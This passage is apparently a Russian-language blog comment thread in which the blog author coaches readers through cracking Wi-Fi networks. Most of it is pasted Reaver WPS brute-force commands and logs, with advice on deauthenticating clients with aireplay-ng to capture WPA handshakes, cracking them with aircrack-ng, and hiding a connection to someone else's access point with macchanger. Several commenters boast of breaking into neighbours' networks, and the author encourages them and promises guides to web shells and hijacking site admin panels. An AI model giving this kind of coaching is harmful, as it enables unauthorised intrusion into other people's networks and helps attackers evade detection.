[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Switching mon0 to channel 12
[+] Switching mon0 to channel 13
[+] Switching mon0 to channel 14
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
F0:7D:68:95:65:82 11 -95 1.0 No DMITRY-Network – канал № 11
Switching mon0 to channel … – это значит что канал не задан
reaver -i mon0 -b F0:7D:68:95:65:82 -с 11 -vv – задать канал № 11
Кто бы мог подумать…. ща попробую….СПАСИБО!!!!
да и ещё. что может означать вот эта строчка:
[!] WPS transaction failed (code: 0?02), re-trying last pin
иногда проскакивает код 03, просто после этой строки начинаются все беды с поиском сети и т.д.
“re-trying last pin” – попробовать последний pin.
Лучше показывайте весь вывод, а то иногда не понятно
Как задать канал
тоесть ка правильно прописать это направление в строке
Что делать когда доходит до 99.99% и начинает перебирать 12349989 бесконечно?
Покажите команды, которые использовали. Шаг за шагом + покажите вывод команд.
Уважаемый Hub-lex , ломать сети все научились :)
Предлагаю перейти к другой статье УК РФ, а именно: что делать дальше со взломанной сетью. :)
Молодцы! Теперь изучайте Linux =)
http://www.levinkv.ru/category/linux/
я посмотрел но ничего конкретного не нашел…. =( можно узнать конкретное название статьи ? заранее благодарен.
Конкретное название статьи по Linux? Если так, то берите любую статью по Linux, которая вам понравится =)
про люникс то понятно =)…. как можно скрыть свое подключение к чужой точке?
Используйте macchanger.
macchanger.??? а по подробнее можно ? ООчень благодарен :oops:
Конечно можно =)
http://www.alobbs.com/macchanger
спасибо!!! если я правильно понимаю его нужно запустить до начала работы ривер ? и запускается командой macchanger –endding eth1 тем самым устанавливая произвольный мас ?
Произвольный МАС-адрес устанавливается командой:
macchanger -r eth0
Одну сеть посчитал быстро – за 3 часа. Пароль подошел.
Попробовал на еще одной сети. Pin рассчитался. Но вот пароль очень длинный (64 символа).
И ssid сети не совпало с истинным значением.
Решил проверить этот пин восьмизначный ХХХХХХХХ (не палюсь, не палюсь))) так:
reaver -i mon0 -b (ну понятно, мак) -c 2 -vv -p XXXXXXXX
Раз пин известен, пароль ривер выдал. Тоже 64 символа. Но абсолютно другие!
Еще раз пробую ту же команду с известным пином, и опять другие 64 символа пароля.
Эту сетку оставить в покое?
Первый роутер был длинк, не из новинок – стандарт n урезанный до 150, а второй тплинк n 300 (полноценный).
Наверно, новизна этого тплинка повлияла на процесс.
Попробуйте посмотреть здесь:
http://code.google.com/p/reaver-wps/issues/detail?id=25
http://code.google.com/p/reaver-wps/issues/detail?id=108
Что происходит дальше? Т.е. есть у вас ключ, вы можете подключиться к сети?
Почитал, пишут, что так происходит, когда WPS включен, а WPA пароля нет.
И ривер заполняет поле WPA мусором длиной 64 символа.
Но решения не увидел.
В моем случае сеть требует пароль (уточню – WPA2), который уж всяко не 64 символа. И возможно это проявляется “уникальное поведение конкретного роутера”.
Вот что на этот счет говорят в Issue 25: “By default, the AP that is started in not configured state will generate a random PSK and move to configured state when the first registration protocol run is completed successfully.”
И в Issue 108: “Some APs generate new WPA keys if they don’t already have one configured. Reaver will always show the WPA key that the AP has returned.”
Loman, это ваша АР так себя ведет или чужая?
p.s.: Желательно найти материал по этому делу! Если найдете, дайте знать =)
Свою то я сломал за 3 часа, а вот чужая не поддается.
Вроде как тп-линки, получается, более бронированные…
Если все таки удастся ее ломануть, тогда зайди в web-интерфейс и посмотри на настройки. Или тех-характеристики вышли, ок? Интересно почему АР себя так ведет…
Привет Так и не решили проблему ?
Так как все-таки сохранять сессию ривера на винт?
Инфо нашел на ачате:
Если пользуетесь загрузочным DVD , сессия сохраняется в дирр. /usr/local/etc/reaver в виде двух файлов F4EC38B3D744.wpc и reaver.db . Эти файлы и нужно скопировать и сохранить на жест. диск.
При следующей загрузке с DVD ,открываете “File system” и далее /usr/local/etc/reaver , из последней удаляете один имеющийся там файл , и вставляете туда предварительно сохраненные F4EC38B3D744.wpc и reaver.db вот и все , сессия по той-же точке начнется с того-же процента выполнения на котором остановлена.
От себя: если файл сохранить не успел, но знаешь примерно на какой пин коде все это дело остановилось, можно запустить взлом этой сетки, подождать, пока пройдет пару пин кодов и нажать ctrl+с. Далее открываем wpc файл по тому адресу, который выше дан, и вырезаем там все пин коды до того пина, на котором остановились. Только первые пару столбцов трогать не надо, там где будут по одной цифре (1, 0, 0, что то вроде того)
Здрасте! Подскажите пожалуйста, если у wash показывает 5 сеток и в строках WPS Locked написано No, то это означает что можна ломать сетку с помощью reaver?
Привет, да.
Уж не откажите в помощи, а? :cry:
В какой?
ПОМОГИТЕ! Как установить драйвер на d-link? Уже которую неделю бьюсь, всё время вижу такое:http://f1.fotozal.com/f/827/13480b.jpg
Дайте вывод команды:
# lspci
вот:http://f1.fotozal.com/f/827/13480f.jpg
Та вы что, это под виртуальной машиной сидите?
Ну как бы да… А что, я совершил ошибку?
как бы virtual box…
Ломать wi-fi сети на виртуальной машине не надо. Загружайтесь с Life USB -> http://www.backtrack-linux.org/tutorials/usb-live-install/
Риверу можно задавать начальное приближение для пина? (Для экономии времени.)
Допустим, пин начинается на 4 и мне это точно известно.
Или интервал, в котором лежит пин, типа от 20000000 до 41000000 ?
доброго времени суток,а существует какой нибудь брутфорс под винду? у меня дома ловит две сетки, пользователи точно чайники и на паролях не озадачены. что бы забить словарик и средствами винды тестить какждый пас на подлинность? сил уже нет сидет на жпрс, перехал в сибирскую глушь инет третий месяц не могу провести ибо нет техвозможноти
Насчет Windows сказать ничего не могу, потому что ломать из под винды считаю извращением =)
Доброе всем. как понимать это:
WARNING. Detected AP rate limiting, waiting 60 sec before re-checking
спасибо
http://code.google.com/p/reaver-wps/issues/detail?id=231
одинаково, я пробывал загрузится с usb все ровно не видит wifi карты :sad:
Значит надо установить драйвера для вашей wi-fi карты.
Попробуйте сделать так:
Ndiswrapper – http://ru.wikipedia.org/wiki/NDISwrapper
How to Install a Wireless Card in Linux Using Windows Drivers – http://www.howtogeek.com/howto/43752/how-to-install-a-wireless-card-in-linux-using-windows-drivers/
Подскажите пожалуйста
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from F0:7D:68:95:65:77
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Associated with F0:7D:68:95:65:77 (ESSID: loko-Network)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-04-05 07:45:09 (0 seconds/pin)
в конце концов около 2-3 часов а после останавливается
Switching mon0 to channel … – переключение каналов. Старайтесь указывать, на каком канале работает АР. Чтобы это указать, нужно добавить в команду reaver следующее: -с (номер_канала)
Sending WSC NACK – когда видите такое, тогда попробуйте запустить reaver с параметром –no-nacks
надо, в конце первого шага, объяснить (не опытным читателям как я) как подключиться к инету. а то делаеш всё пошагово точно но не хрена в конце не выходи т. к. инет не подключён и reaver не установился ! а не опытный пользователь от куда знает установился он(reaver) или нет!?
нашол решение на другом сайте, там копия вашей статьи, но с не большой дописочкой. вот она: Выберите Applications> Internet Wicd Network Manager.
Выберите свою сеть и нажмите Connect, введите пароль, если необходимо, нажните кнопку ОК и нажните кнопку Connect вторично………..
А я нашел, куда ривер сохраняет сессию.
Нужны 2 файла: reaver.db и xxxxxxxxxxxx.wpc (где иксы – мак адрес сети, которую ломаете).
И лежат они по пути: File system/usr/local/etc/reaver
Где все это искать в бактраке?
Верхний левый угол дисплея, вкладка Places, и выбираете из выпадающего списка любое место, хоть desktop.
Откроется File browser. Здесь и разделы винчестера видны.
В нем выбираете File system, ну и далее как в винде, идете по пути system/usr/local/etc/reaver.
И есть два варианта сохранения. Копируете эту папку reaver с 2 файлами на винчестер, и когда вновь запустите бактрак, перед запуском ривера, скопируете ее в то же место File system/usr/local/etc/reaver.
А второй вариант без копирования: после нажатия ctrl+с и сохранения сессии (когда ривера уже нет в оперативной памяти), открыть файл xxxxxxxxxxxx.wpc встроенным в бактрак прогой text editor и запомнить первую строку из 4 цифр. Это первые 4 цифры пина, на котором остановился ривер. Допустим 3316.
А когда вновь загрузите бактрак, запускайте ривер для расчета пина, пусть минуту посчитает. Потом жмем ctrl+с. Открываем файл xxxxxxxxxxxx.wpc с помощью text editor и меняем первую строку на то число, что запоминали минус один, т.е. 3315, на всякий случай, чтобы ривер не пропустил случайно пин. Т.е. мы его немного назад возвращаем в расчетах.
Я так уже пробовал делать, все ок.
да точно все работает =) подтверждаю
Тож работает!!! Молодец!!! Это уже серьёзная заявка на победу!!! :razz:
Loman, ваш ответ войдет в “Reaver FAQ – http://www.levinkv.ru/faq-po-reaver-sdelaem-eto-vmeste/“!
Поздравляю, так держать!
экспериментирую на своей сети,за сутки всего 5%
что ж оно так долго? и о каких там 5-ти 10-ти часах шла речь не понятно. и вообще это нормально?
да это нормально)
покажи что выводится
спасибо за ответ! последнее из того, что выводится:5.29% complete @ 2012-04-10 17:32:52 (164 seconds/pin)
[+] Trying pin 05725670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0×02), re-trying last pin
[+] Trying pin 05725670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 05735679
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
вы писали:Sending WSC NACK – когда видите такое, тогда попробуйте запустить reaver с параметром –no-nacks. скажите пожалуйста, а что означает этот вывод: Sending WSC NACK и стоит ли мне сейчас вводить этот параметр? за ранее спасибо.
Zdravstvuite Hub-lex
U menia tozhe samoe:
iwconfig
airmon-ng start wlan1 (USB Adapter)
airodump-ng mon0
wash -i mon0
reaver -i mon0 -b bssid xxxxxxxx-vv
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0?02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] 0.00% complete@ 2012-04-12 14:05:20 (0 seconds/pin)
I tak vsiu noch.
Ne mogli by vy privesti primer comandy (reaver) vkliuchaia (–no-nacks)? A imenno:
root@bt:~# revear -i mon0 -b bsssidxxxxxxxxxxx -c 1 –no-nacks -vv
ili
root@bt:~# revear -i mon0 -b bsssidxxx -c 1 -vv –no-nacks ?
Spasibo zaranee za otvet.
root@bt:~# revear -i mon0 -b bsssidxxx -c 1 -vv –no-nacks
а что делать если wps отключен? как тогда быть?
Если WPS отключен или его нет на АР, тогда нужно поймать handshake и попытаться его расшифровать.
Добрый день, Hab-lex! Подскажите, а как поймать handshake, а точнее команду которую надо ввести, а так-же , по возможности команду которую можно ввести для деактивации МАС адреса от которого ловлю handshake. Спасибо!!!
Добрый день!
Handshake вы можете поймать, только если на АР висят другие клиенты – это важно! Чтобы его поймать, вы должны послать АР пакет на деаутентификацию клиента:
# aireplay-ng -0 1 -a 00:22:B0:BE:75:3D -c 70:F1:A1:72:B4:25 mon0
-0 – деаутентификация
1 – количество пакетов
-a – MAC-адрес точки доступа
-c – MAC-адрес клиента, к которому применяется деаутентификация
Второй вопрос не понял, поясните.
Я просто ошибся : вместо деактивации, надо было написать деаутентификация! Спасибо, всё теперь понятно. И ещё планируете ли Вы писать статью о том как поймать handshake, и соответственно как его потом расшифровать. Спасибо за статьи, всё очень понятно и доступно написано!!!
Большое спасибо)
Да статьи по Wi-Fi будут! Еще столько классных штук можно делать и я хочу их показать и описать=)
По возможности буду стараться выкладывать статьи быстрее, но там уж как со временем получится.
процесс пошел .. а дальше ?
Давайте в skype: hub-lex-21. Здесь не очень удобно.
Попробовал, вот что пишет:
root@bt:~# aireplay-ng -0 2 -a B8:A3:ХХ:ХХ:ХХ:F4 -c 6C:E9:ХХ:ХХ:ХХ:AC mon0
20:50:49 Waiting for beacon frame (BSSID: B8:A3:ХХ:ХХ:ХХ:F4) on channel 11
20:50:50 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 0|54 ACKs]
20:50:50 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 7|54 ACKs]
root@bt:~# aireplay-ng -0 5 -a B8:A3:ХХ:ХХ:ХХ:F4 -c 6C:E9:07:42:0C:AC mon0
20:51:46 Waiting for beacon frame (BSSID: B8:A3:86:1A:77:F4) on channel 11
20:51:47 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 2|61 ACKs]
20:51:47 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 0|62 ACKs]
20:51:48 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 0|61 ACKs]
20:51:48 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 3|58 ACKs]
20:51:49 Sending 64 directed DeAuth. STMAC: [6C:E9:ХХ:ХХ:ХХ:AC] [ 4|58 ACKs]
CH 11 ][ Elapsed: 24 mins ][ 2012-04-20 21:12
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
B8:A3:ХХ:ХХ:ХХ:F4 -85 0 9198 183 0 11 54e WPA2 TKIP PSK My_Wi-Fi
BSSID STATION PWR Rate Lost Frames Probe
Что-то не так? пробовал указывать деаутентификацию и 100 и 200 число вводил, а handshak всё нет и нет :cry: .... так-же команда :
besside-ng mon0 желаемого handshake не даёт. .. Что не так делаю?
Шаг за шагом покажите действия, которые выполняли и вывод.
а как можно узнать MAC-адрес клиента, к которому применяется деаутентификация?
Выполните команду:
# airodump-ng mon0
Для примера посмотри вот это – http://www.levinkv.ru/wp-content/uploads/2011/12/airodump_part_3.png
в самом низу АР с МАС = 00:02:CF:AE:7E:E8 и подключенный к ней клиент с МАС = 48:5D:60:F3:3D:88
p.s.: старайтесь искать сами. в блоге выбираете категорию по Wi-Fi и читаете статьи в которых все написано. потому что на подсказках вы не изучаете (голова не работает), а действуйте по шаблону. таким образом вы мало чему научитесь. (СОВЕТ)
спасибо за совет!про других клиентов ничего не находил,наверное плохо искал…
Для Алексей: после ввода команды # airodump-ng mon0 надо просто подольше подождать… и бедет тебе счастье в виде MAC-адресов клиентов. Сам я жду минут 15-20 … после этого все адреса как на ладони. Правда иногда замечал что некоторые сети перескакивают на другой канал….х.з. почему..
что то не ловится handshake . вот что получилось
root@bt:~# aireplay-ng -0 1 -a C8:60:00:93:55:B4 -c 00:13:02:2C:75:FD mon0
16:14:23 Waiting for beacon frame (BSSID: C8:60:00:93:55:B4) on channel 4
16:14:33 No such BSSID available.
Please specify an ESSID (-e).
что это означает?
Please specify an ESSID (-e) – означает что не указан SSID АР. Команда должна иметь след. вид: # aireplay-ng -0 1 -a C8:60:00:93:55:B4 -c 00:13:02:2C:75:FD -e mon0
НО алексей, вы опять ничего не пишите. предыдущие комментарии от меня кажется остались не услышанными. Еще раз вым говорю, предоставьте Все команды, которые вводите и их вывод.
комментарии услышаны,через день может попробую и покажу всю картинку своих действий.дома то я себя и двух соседей взломал.потому что включен WPS, а вот в другом месте попался WI-FI без WPS ,вот и мучаюсь…
Хорошо, как будете готовы пишите.
как то что то опять не получилось root@bt:~# iwconfig
lo no wireless extensions.
wlan0 IEEE 802.11bg ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
eth0 no wireless extensions.
root@bt:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2354 dhclient3
2412 dhclient3
Process with PID 2412 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros AR2425 ath5k – [phy0]
(monitor mode enabled on mon0)
root@bt:~# airodump-ng mon0
CH 3 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -73 19 0 0 4 54 WPA2 CCMP PSK KMB g
F8:D1:11:43:CC:A0 -93 7 0 0 8 54e. WPA2 CCMP PSK TP-LIg
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <leng
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -73 20 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -71 21 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_4
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:
BSSID STATION PWR Rate Lost Frames Probe
CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
00:02:CF:CF:41:01 -70 22 0 0 4 54 WPA2 CCMP PSK KMB
F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_43
00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:
BSSID STATION PWR Rate Lost Frames Probe
CH 12 ][ Elapsed: 4 mins ][ 2012-05-16 16:14
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:CF:CF:41:01 -65 703 9 0 4 54 WPA2 CCMP PSK KMB
C8:60:00:93:55:B4 -71 374 39 0 1 54e WPA2 CCMP PSK Oleg
F8:D1:11:43:CC:A0 -82 249 23 0 8 54e. WPA2 CCMP PSK TP-LINK_43CCA
00:13:1A:57:65:A0 -101 29 18 0 1 11e. OPN
1C:7E:E5:FF:90:72 -101 62 0 0 11 54e WEP WEP DIR-300NRU
D8:5D:4C:D2:E3:C8 -100 21 0 0 11 54 . WPA2 CCMP PSK Internet
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 30:38:55:C4:31:3A -93 0 - 1 0 5 00:02:CF:CF:41:01 00:19:D2:23:5E:D3 -84 54 - 1 0 82 KMB F8:D1:11:43:CC:A0 00:1C:BF:3B:7E:70 -97 54e- 1e 0 20
root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0
16:15:41 Waiting for beacon frame (BSSID: 00:02:CF:CF:41:01) on channel 12
16:15:51 No such BSSID available.
Please specify an ESSID (-e).
root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 -e mon0
No replay interface specified.
"aireplay-ng --help" for help.
root@bt:~#
А только под линуксом бэктрэк запускается? под виндой нельзя?
BackTrack – это дистрибутив Linux.
Если я что то не понял, тогда поясните.
То есть никак нельзя не устанавливая линукс взламывать?
Конечно можно! Вам нужно:
1. download BT5R2 – http://www.backtrack-linux.org/downloads/
2. and install BT5R2 to USB – http://www.backtrack-linux.org/tutorials/usb-live-install/
Здравствуйте. Пытаюсь взломать свою сеть и ничего не получается.
1. WPA2-PSK включен
2. Сигнал отличный(роутер в 3 метрах)
3. фильтрация по MAC адресу выключена.
reaver работает, но постоянно выдает:
! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: XXXX)
P.S. такое же сообщение при взломе чужой сетки
Здравствуйте. Покажите, какие команды вводили (ввод) и их вывод.
все по инструкции:
1 >>apt-get update
2 >>apt-get install reaver
3 >>iwconfig
<>airmon-ng start wlan0
<>airodump-ng mon0
<>reaver -i mon0 -b XX:XX…:XX -vv
<<waiting from baecon from XX:…:XX
<<switching mon0 to channel 11
<< ! WARNING : Fialed to associate with XX:XX:XX:xx:xx:xx (ESSID: XXXX)
дальше все повторяется пока не отключю.
Покажите вывод команды wash.
Hub-lex очень тебе благодарен за статью.Я не оч продвинутый но уменя все получилось.с BT5R1 не невышло а BT5R2-на ура. наверное потому что в него интегрирован reaver.Для статистики-на ноуте lenovoG575 c win7 не пошло…а на samsungR20 c win xp все получилось.соседский TP-Link за 11часов.свой d-link за 14часов.долго но результативно.еще раз спасибо
Большое спасибо, рад что получилось))
Теперь можно начинать, что то другое. Например, – http://www.levinkv.ru/category/bezopasnost/metasploit/
Дальше будет лучше!
а если клиент отключит на какое то время вай-фай,чего тогда делать?
Ждать или поискать другую АР.
а сколько ждать можно?
а то у меня 47% отсканировал и клиент пропал и это всё за 12 часов.обидно будет начинать всё заново
Вы не могли бы давать более информативные сообщения?! Давайте все сначала и по шагам.
за 12 часов reaver обработал 47%,а потом клиент вай-вай исчез.минут через двадцать появился снова и reaver продолжил свою работу.на ночь клиент по любому отключит вай-фай,вот я и спрашиваю.что мне делать дальше?ждать когда утром он опять включится?это мне получается надо оставить работающий reaver и комп соответсивенно не выключать?
Вы можете сохранить сессию и спокойно идти домой, а когда снова вернетесь, возобновить ее.
О том как сохранить сессию, вы можете прочитать в комментарии от Loman в этой статье.
спасибо!хорошая штука,помогла.
Блин. 100500-ый раз уже пробую, ничего не получается. При поиске сетей в wich network manager пишет no wireles network found. При команде iwkonfig похожая фигня. Пробовал как на ноутбуке, так и на десктопе. ничего… Уж подскажите?
PАБЫЛ СКАЗАТЬ, ЧТО В ОБЕИХ СЛУЧАЯХ ИНДЕКАТОР WIFI НЕ ПОДАЁТ ПРИЗНАКОВ ЖИЗНИ…
Hub-lexЕсли WPS отключен или его нет на АР, тогда нужно поймать handshake и попытаться его расшифровать…
Чем расшифровывать, aircrack или reaver?
Да, если WPS на АР отключен или его просто нет. Тогда нужно поймать handshake между клиентом АР и самой АР. Расшифровать handshake можно с помощью aircrack-ng.
p.s.: cтарайтесь пожалуйста разбираться в деле, которым вы занимаетесь. Т.е. посмотрите свой вопрос в Интернете. Старайтесь не просто сделать все по шаблону, а именно разобраться что, как и почему.
Hub-lex подскажите пожалуйста что сделал не правильно при запуске reaver выдает command not faund (стоит БТ-5Р1 файл reaver db установлен) также не проходит команда sudo wash-i mon0 выдает то же самое
Если вы запускаете reaver и на это действие появляется ошибка “command not found”. Тогда это значит, что reaver у вас не установлен. Попробуйте воспользоваться вот этой статьей (http://www.levinkv.ru/ustanovka-reaver-v-backtrack-5-r1/). Чтобы попробовать установить reaver. Если же у вас не получится, тогда вы всегда можете скачать BackTrack 5 R2. В нем reaver & wash уже установлены.
качайте BackTrack 5 R2, в него reaver уже встроен.всё намного проще получается,когда нет интернета.Уважаемый,hub-lex!обновите инфу пожалуйста.людям облегчите их мучения :smile:
алексей, спасибо вам за совет! Информация обновлена в самом начале статьи.
Блин. 100500-ый раз уже пробую, ничего не получается. При поиске сетей в wich network manager пишет no wireles network found. При команде iwkonfig похожая фигня. Пробовал как на ноутбуке, так и на десктопе. ничего… Уж подскажите? И ещё: устанавливал оба бэктрека, при попытке подключится индекатор wifi не мигает…
Может быть у вас проблема с драйверами? Покажите выводы команд: iwconfig, lspci.
Я скачал BackTrack 5 Live DVD iso но комп не загружается с диска. В чем причина – в биосе все настроен нормально.?
Не могу точно ответить – мало информации.
Попробуйте зайти в Boot-menu, когда загружается компьютер. И выберите ваш диск от туда. Также можно загрузить iso на флешку – скорость считывания будет гораздо выше чем с диска.
Добрый день Hub-lex! Хочу искренне выразить вам благодарность за статьи, хорошие и полезные, а главное написанные понятным языком, что любой чайник всё поймет.
У меня к Вам вот какой вопрос: планируете ли вы статьи по взлому сайтов, а так-же как перехватить “АДМИНКУ” сайта. Было бы очень интересно узнать о “движках” используемых на сторонних сайтах и способах проверки на безопасность, ведь многие сайты созданы в LINUX и как можно осуществить захват FTP админ и т.д. Думаю что данные статьи будут очень популярны!!!!
Ещё раз ОГРОМНОЕ СПАСИБО за Ваши статьи. !! Лично я узнал много полезной информации, ну и конечно халявный WiFi.!!!
Большое спасибо!
Да, есть такие мысли. Будут статьи по: шелам (Shell С99), взлом сайтов по web-уязвимостям, взлом сайтов по ОС-уязвимостям и т.п. В общем еще будет много интересных статей.
Также разрабатывается учебный материал по Linux – LPIC1 (online-курсы).
а можно сделать отдельную статью про WPA с отключенным WPS ?или подскажите,где можно что то конкретное по этой теме почитать?
Такая статья скоро выйдет! Главное дождитесь. Мне физически не успеть: работа, блог, самообразование, freetime.
будем ждать!за предоставленный материал спасибо!
Спасибо огромное за материал, но со всеми сетями у меня ошибка WARNING: Failed to associate with. Ловит почти все хорошо, скан показывает, что wps выключен. Что надо делать?
Давайте с вами договоримся сразу! Предоставляйте и команды и их вывод. Говорите подробно, что вы делать и что у вас получилось.
Что касается этого сообщения – какой у вас уровень сигнала?
